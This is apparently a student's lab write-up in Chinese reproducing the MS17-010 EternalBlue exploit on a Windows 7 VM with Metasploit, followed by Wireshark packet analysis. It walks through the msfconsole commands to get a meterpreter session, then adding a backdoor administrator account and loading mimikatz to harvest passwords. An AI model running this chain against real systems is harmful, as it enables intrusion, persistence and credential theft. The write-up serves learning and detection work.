ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码

安全小白 整理分享学习过程 欢迎指点 呜呜呜卑微仔、、、

一、实验环境

1、攻击机:Kali               IP:192.168.218.157

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第1张图片

1)攻击工具:msf

2)分析工具:wireshark

2、靶  机:Windows7(旗舰版)   IP:192.168.218.160

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第2张图片

1)开启网络共享(SMB协议)

2)关闭防火墙

3、网卡连接方式:Vmnet8(NAT)

二、实验步骤:

1、测试攻击机与靶机的连通性

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第3张图片

2.进行MS17-010漏洞扫描

1)启动msf

命令:msfconsole

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第4张图片

2)搜索ms17_010

命令:search ms17_010

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第5张图片

3)smb_ms17_010模块进行MS17-010漏洞扫描

4)设置攻击载荷

payload模块进行反弹连接

5)查看需要设置的模块(带yes的)

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第6张图片

6)设定监听主机 set lhost 192.168.218.157(kali)

设置扫描的主机(网段)以及端口号  SMB协议默认445端口

命令:set rhosts 192.168.218.160/24

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第7张图片

7)执行exploit(run)命令进行扫描  发现目标主机漏洞

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第8张图片

可以看到监听IP及端口,攻击机与靶机之间成功建立会话

出现meterpreter>攻击成功!渗透后信息收集、持续攻击

  1. 远程显示主机系统信息

Meterpreter>sysinfo

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第9张图片

2)查看用户身份

Meterpreter>getuid

3)获得shell控制并新建一个用户

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第10张图片

4)将此用户加入本地管理员组(后门植入,获取更大的权限)

 ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第11张图片

  • wireshark数据抓包 分析攻击过程

选择vmnet 8网卡

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第12张图片

  1. 首先攻击机(Kali Linux)向靶机(Windows 7)发送一个SMB的Negotiate Protocol Request(协商协议请求)数据报,并列出攻击机所支持的SMB协议版本。
  2. 服务器响应一个SMB的Negotiate Protocol Response (协商协议响应)数据报; (如果无可使用的协议版本则返回0XFFFFH,结束通信。)
  3. 攻击机(Kali Linux)向靶机(Windows 7)发起一个Session setup X request(会话设置请求)数据报.

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第13张图片

 

  1. 靶机(Windows 7)确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接.
  2. 靶机(Windows 7)确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接。
  3. 协商和认证成功之后,攻击机向靶机发送一个Tree Connect AndX Request(树连接和请求)数据报,列出要访问的网络资源的名称(匿名管道共享)

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第14张图片

  1. 服务器会发送一个Tree Connect AndX Response(树连接和响应)数据报,同意访问资源,并列出访问者的权限

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第15张图片

  1. 连接到相应资源后,进行正常的网络共享访问

攻击过程重要数据特征

1.NT空载指令

2.TRANS 2 攻击负载 拆分

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第16张图片

3.Response =>Multiplex  ID:64(攻击成功)

 ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第17张图片

过程中所遇到的问题:

Exploit completed, but no session was created.(攻击成功但会话未连接)

如果出现以下情况之一,则“无会话已创建”消息

发生:

1)使用的漏洞利用对所选择的目标不起作用。可以

是一个不同版本的漏洞,有一个问题

利用代码,或目标配置有问题。(经检查验证是此问题)

2)使用的漏洞利用被配置为使用不创建的有效载荷

互动会话。在这种情况下,框架无法知道

被剥削者是否工作,因为它没有收到连接

从目标成功时(例如运行记事本)。

如果尝试反向有效载荷,获取该消息和目标服务

不会崩溃,确保您的目标设置是正确的,而且

目标系统正在运行正确版本的易受攻击的软件。

meterpreter中使用mimikatz抓取密码

参考链接:

https://blog.csdn.net/qq_36374896/article/details/107005461?utm_source=app&app_version=4.8.1

  1. 进去meterpreter后getuid一下-----获得系统管理员权限

    2. 加载mimikatz模块----load mimikatz

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第18张图片

ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码_第19张图片

你可能感兴趣的:(安全漏洞,网络安全)